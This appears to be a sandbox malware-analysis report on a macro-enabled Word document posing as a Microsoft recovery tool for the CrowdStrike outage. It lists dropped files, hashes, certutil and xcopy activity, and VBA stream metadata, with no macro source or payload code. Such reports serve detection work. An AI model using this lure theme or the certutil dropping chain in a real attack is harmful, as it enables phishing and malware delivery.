        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Microsoft Word 2007+
        Category:dropped
        Size (bytes):20515
        Entropy (8bit):7.469835486287775
        Encrypted:false
        SSDEEP:384:Pjl/SU5NrbWwV+A9QG6F7//oMaoNy3aPWPOzROejkIQMAPZU:LrPlo1k3aPWPONjkIFAK
        MD5:747F920591F171BA793209DB3BFD8A21
        SHA1:BCF601F9500A6B5C20DB101840F4288D685FC57D
        SHA-256:74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
        SHA-512:0D37436D7BF6BF640377525F7E2E926929B64C5D31686B4CF69083CCCDF53AC4F85F98BF380D49DE9B585055237FA9156D696C81081B676364771F2415790683
        Malicious:false
        Preview:PK..........!.+:.P............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g..6@]t.#.._.0..}......QM.l..1....5...YS.@D.].....I..[....k..U..S.x.-......7..6.V..e...'.Qn..l|.Go:..Ht..<.y%....f.....Ku..l1....6.Z...=I......0{.L.`...H..S.\.CC..op...#..O:.7....Si.VP]....K...G...rh.......$....BF.t..Z.y.]O..+...,..{.j.uZ...qB...i..i.....t.,..$-my.{...q7H..JL..{P.E..../Fq$>...FX.)...b...k..E.Ni..0C..^.P..7z`.......E<......)...G.]....9./......g...I4...g....<eI[."..4m.?.6.q..k
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Microsoft Word 2007+
        Category:dropped
        Size (bytes):250145
        Entropy (8bit):7.9935463566733125
        Encrypted:true
        SSDEEP:6144:m00BJM20XF07Jtd0YPFKGTFHLYwgNkSagBRK3WJMLtFqFk06TOOp7uuVZpVPvG:wBJUXydtdfogBLngNMVG6xFqJ6TOOdur
        MD5:891E6C7EC5DE6384509564D8A0DEDECF
        SHA1:187994C9D8A21DD977473EF8E7A6EF4C7F2EAE52
        SHA-256:1E224B11854CE62115305CE613169DAD1C4AA59D35C8482E979532ADCA124A10
        SHA-512:27D6EF69B33A4F363E3D939EA4988A477B09F40401FF7645A6D7AA2ABDB9F7AD329C6A70B50996F27789164E5E2E4A41C12B3BACD2FB2B4EAC9486C00AD4D7E8
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview:PK..-.......!..am.............[Content_Types].xml.......................n.0.........D...(,...6@. W.Z.t...k'~..-Eh..tj.b.".Y.....Yw..|P.l^.X.F.Z..d..../,.(L-:k.d;..z....~. d.6.d+D... W.E(..C+..Z ..-wB..-.O..g..A0.cd.......0.}..}.J..}..E....:%..2...!.M.$..J.y......[...L..f.= ..D......R....r.6.p.+....Oj.W5dw....i......M..8f8.()F....[#..hU(s.r....(.a6(...&.....AS.].......w`.m.F.xT..........{.9o%.@8..#:.".p..=7m..$.".@NFx...d)..'.4..8E7Ft2..z../.d........z..} .8....N.@...=.$..c..s?....Q.....;i....>.>..[..{...}....9...,.. ..PK..-.......!..U~............._rels/.rels......................MK.1....!.;.*"..^D.Md..C2.........(.....3y..3C....+.4xW..(A.......yX.JB....Wp.....b..#InJ......*.E..b.=[J....M.%...a .B..,o0.f@=a... n........o.A..;.N.<...v.."...e...b.R...1..R.EF..7Z.n...hY..j.y..#1'.<....7.......9m.......3...Y.. ..PK..-.......!.qq..............word/document.xml....m.......2(.......}.n........^..-.N.3I QT.M..hw.9@..E...S$./.}...;.... .G.'..*R..v.@-+.A
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):70144
        Entropy (8bit):4.6310420804504275
        Encrypted:false
        SSDEEP:384:xtT+CeCz8l15lZzNKY235JzN0jyLUt3EN+DCz8l15lZzNKY235JzPN0jyL:aCa/lZzNj235lNdOCa/lZzNj235l1d
        MD5:7911062030D6DA09593877F2B52686EC
        SHA1:04AA8A751201A7373844A0AD9CA64403FADE98DA
        SHA-256:5D9BF8B45FB2E025C833D6A12BF29CC1C7F3DE7315E57A893354C826BD5A0207
        SHA-512:162008F9523744C2DF75E2B74CAC7AE034F79E2E2EC35A8337E0CDD2393A09E8F4B711DB5E844A362917C9000DF420F1B82A9C46F55D7315D1274E9F3DD8033E
        Malicious:false
        Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>...D...................................................................................................................................................................................................................................?...@...A...B...C...E...~.......................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):81920
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:030A4F48DC8DB0956ADD25994004E5CA
        SHA1:D81C6AFAF95FA3886685DF4F9F7D93F4F403226C
        SHA-256:FA569E2360C540E6280E34A4627516770F1A5F34D81D35689334A99CC1013357
        SHA-512:9B844A86C0995A64A9CF163BCB58B8B1F2302E65B03CF5D90445078B0DBA11C687BBE1D94B81DB5EF52651BCC5D0B39EBFED9940D416E05A35330C17BF1E6D68
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
        Category:dropped
        Size (bytes):41984
        Entropy (8bit):3.6661534757164875
        Encrypted:false
        SSDEEP:768:GxRM3+y24Zwkvp1RkxOIvMILjnOojy1TRUS7V8iOuCDSe3fsM8pp3:GxW3+54Kkvp1RkxOIvfPnOojGV8juCDG
        MD5:6156FD728E0A9488C31DF5BBC8F844BF
        SHA1:16B20A75C6113409F1E78A1B66B1E2B647713DE2
        SHA-256:07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
        SHA-512:0A56DC6F0193CE70F4DC0876FCBE7ABC53D23F8A5C80032C68F49856A16B64B3B2E4B5BBAFA384FF57F0A586A484DB1464EE65EC5454BA64DB5E23AF1B3A9A13
        Malicious:false
        Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .......................................................X...........$...(.......$...(......................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..M...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
        Category:dropped
        Size (bytes):41984
        Entropy (8bit):3.6661534757164875
        Encrypted:false
        SSDEEP:768:GxRM3+y24Zwkvp1RkxOIvMILjnOojy1TRUS7V8iOuCDSe3fsM8pp3:GxW3+54Kkvp1RkxOIvfPnOojGV8juCDG
        MD5:6156FD728E0A9488C31DF5BBC8F844BF
        SHA1:16B20A75C6113409F1E78A1B66B1E2B647713DE2
        SHA-256:07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
        SHA-512:0A56DC6F0193CE70F4DC0876FCBE7ABC53D23F8A5C80032C68F49856A16B64B3B2E4B5BBAFA384FF57F0A586A484DB1464EE65EC5454BA64DB5E23AF1B3A9A13
        Malicious:false
        Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .......................................................X...........$...(.......$...(......................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..M...
        Process:C:\Windows\System32\xcopy.exe
        File Type:PE32+ executable (console) x86-64, for MS Windows
        Category:dropped
        Size (bytes):530944
        Entropy (8bit):6.426002179912066
        Encrypted:false
        SSDEEP:12288:fY/9QPTCgxPjg26sSS4x0WZ40lNYgBOJDN3NlhBATWStJ:geLCY0mSSxWG0lN1O7rA6StJ
        MD5:EAC53DDAFB5CC9E780A7CC086CE7B2B1
        SHA1:C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F
        SHA-256:D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
        SHA-512:1B04B40D36B6CDCB805C720341A21885594B9C7BAEAD0A6CC56E7F6CC1ACDFDB2522C12276B0973EAF2911A6D2A105DEFC27D48E574A6F87A11BFACCACF65E3F
        Malicious:false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Process:C:\Windows\System32\certutil.exe
        File Type:PEM certificate
        Category:dropped
        Size (bytes):730108
        Entropy (8bit):5.445175115010181
        Encrypted:false
        SSDEEP:12288:sbWG2aZxq0mOWBsfuZ6/D7ilVVMvk43mw:siG2RvOWB8ui7kVVEB
        MD5:6CD8C188A2B0A5A11B2F02648B675874
        SHA1:11F8F207DA2F2B64E8A978B37BC091DA25B380C4
        SHA-256:B27A847F5059294E8E6F9C8B939C0437173C73E0194CF03CDCE4092A025B0C8F
        SHA-512:8C83E985C44F63E382CCFE64662D3E54137A4ADE7C0EE9BC409095F0631D471BFEF7A00FB8E6073CAFDD9ACAA8E241BACEC934AE1430728749002882D2BE366B
        Malicious:true
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:GIF image data, version 89a, 15 x 15
        Category:dropped
        Size (bytes):663
        Entropy (8bit):5.949125862393289
        Encrypted:false
        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:GIF image data, version 89a, 15 x 15
        Category:dropped
        Size (bytes):663
        Entropy (8bit):5.949125862393289
        Encrypted:false
        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:13 2023, mtime=Fri Aug 11 15:42:13 2023, atime=Mon Jul 22 12:51:17 2024, length=250145, window=hide
        Category:dropped
        Size (bytes):1299
        Entropy (8bit):4.58294566129774
        Encrypted:false
        SSDEEP:24:83C1z/XT4lopZGYcPxD/juxNeMuYZscPxD/juvDv3q8k7N:8sz/XTk8HclWVuYZsclp8iN
        MD5:8080A08A9762D4028FCFCD91E287A9A6
        SHA1:DCF3276796F1F251023389829C817EEF32BE9771
        SHA-256:9A68761F2A1D1574751C6C3E59C30A8BB361102A2F17F0F9F54133A1992CE3DD
        SHA-512:7DC5A94218F8042B645EB906324F56ADE093E4D6EFFD5E09E80062E39AFC1CCDBBE32CB7E26398714CA2D61E305A013F34A26B78656CB1AE869135245497709A
        Malicious:false
        Preview:L..................F.... .......r.......r.....9>...!.......................A....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Xfn..user.8......QK.X.Xfn*...&=....U...............A.l.b.u.s.....z.1......Xjn..Desktop.d......QK.X.Xjn*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.!....Xin .NEW_RE~1.DOC..........WG..WG.*.........................N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.i.n.d.o.w.s...d.o.c.m.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm.^.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [folders]
        Category:modified
        Size (bytes):167
        Entropy (8bit):4.781242661256441
        Encrypted:false
        SSDEEP:3:HgA5AgFis6NAb6SQomZuMigIubNJYCm4wAgFis6NAb6SQomZuMigIubNJYCv:HFTFipAb6WmZuMiYbNWJFipAb6WmZuM3
        MD5:87E4B3E63F6FD43B41CB6BC643DAA68C
        SHA1:624BF01A26B59C2888129E771AF3579FFF15934F
        SHA-256:A496015FB1BF4656E45CB323ADEFB73534FA599934A83E4EB8CDEC9751A98353
        SHA-512:22B0BEE3C94F3C2AF4664ECD0D151312E13F64EC960C1D7FE2736BE249762E255ABC1B9ED5CA88BCB13D5934BAFD1D723CC6ABF4F8559B4D0B8E3572F9AB2E9E
        Malicious:false
        Preview:[misc]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..[folders]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
        MD5:C4615A023DC40AFFAEAE6CF07410BB43
        SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
        SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
        SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
        Malicious:false
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
        Category:dropped
        Size (bytes):2
        Entropy (8bit):1.0
        Encrypted:false
        SSDEEP:3:Qn:Qn
        MD5:F3B25701FE362EC84616A93A45CE9998
        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
        Malicious:false
        Preview:..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
        MD5:C4615A023DC40AFFAEAE6CF07410BB43
        SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
        SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
        SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
        Malicious:false
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:dropped
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:false
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:dropped
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:true
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:dropped
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:false
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:downloaded
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:false
        URL:https://download.microsoft.com/download/8/e/1/8e189885-12fe-4ebe-895d-b2d5a08aae65/MsftRecoveryToolForCSv2.zip
        File type:Microsoft Word 2007+
        Entropy (8bit):7.938940748289286
        TrID:
        • Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96%
        • Word Microsoft Office Open XML Format document (49504/1) 36.13%
        • Word Microsoft Office Open XML Format document (27504/1) 20.07%
        • ZIP compressed archive (8000/1) 5.84%
        File name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
        File size:310'160 bytes
        MD5:dd2100dfa067caae416b885637adc4ef
        SHA1:499f8881f4927e7b4a1a0448f62c60741ea6d44b
        SHA256:803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
        SHA512:809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
        SSDEEP:6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8
        TLSH:1664E12B7D13A023F52BD6349E903E6C72026111A3935374B9286B7FF26D14F9D8E54B
        Icon Hash:65e6a3a3afbfb9af
        Document Type:OpenXML
        Number of OLE Files:1
        Has Summary Info:
        Application Name:
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Author:Le Nho Thanh
        Template:Normal.dotm
        Last Saved By:David
        Revision Number:3
        Total Edit Time:4
        Create Time:2024-07-19T10:29:00Z
        Last Saved Time:2024-07-22T09:13:00Z
        Number of Pages:9
        Number of Words:2526
        Number of Characters:14404
        Creating Application:Microsoft Office Word
        Security:0
        Number of Lines:120
        Number of Paragraphs:33
        Thumbnail Scaling Desired:false
        Company:Microsoft
        Contains Dirty Links:false
        Shared Document:false
        Changed Hyperlinks:false
        Application Version:16.0000
        General
        Stream Path:VBA/ThisDocument
        VBA File Name:ThisDocument.cls
        Stream Size:27601

        General
        Stream Path:PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:376
        Entropy:5.349004928853029
        Base64 Encoded:True
        Data ASCII:I D = " { 6 3 9 4 0 D 1 7 - 7 B C 7 - 4 1 4 6 - B A 9 5 - 1 3 8 9 F F 7 0 2 C 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 6 E 4 7 9 6 1 8 9 A 1 8 9 A 1 8 9 A 1 8 9 A " . . D P B = " A A A 8 1 1 B 6 E 7 B 7 E 7 B 7 E 7 " . . G C = " 7 F 7 D C 4 E D 4 C 1 7 2 0 1 8 2 0 1 8 D F " . . . . [ H o s t E x t e n d e r I n f
        General
        Stream Path:PROJECTwm
        CLSID:
        File Type:data
        Stream Size:41
        Entropy:3.0773844850752607
        Base64 Encoded:False
        Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
        General
        Stream Path:VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2976
        Entropy:4.617966626265468
        Base64 Encoded:False
        General
        Stream Path:VBA/__SRP_0
        CLSID:
        File Type:data
        Stream Size:2782
        Entropy:3.5082390293182035
        Base64 Encoded:False
        Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . U . B - . . . . . . . . . . . . . .
        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
        General
        Stream Path:VBA/__SRP_1
        CLSID:
        File Type:data
        Stream Size:174
        Entropy:1.6032810527820052
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
        General
        Stream Path:VBA/__SRP_2
        CLSID:
        File Type:data
        Stream Size:1224
        Entropy:2.0062113510689086
        Base64 Encoded:False
        Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 05 00 05 00 00 00 31 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 51 0d 00 00 00 00 00 00 00 00
        General
        Stream Path:VBA/__SRP_3
        CLSID:
        File Type:data
        Stream Size:356
        Entropy:2.1693699541959686
        Base64 Encoded:False
        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
        General
        Stream Path:VBA/dir
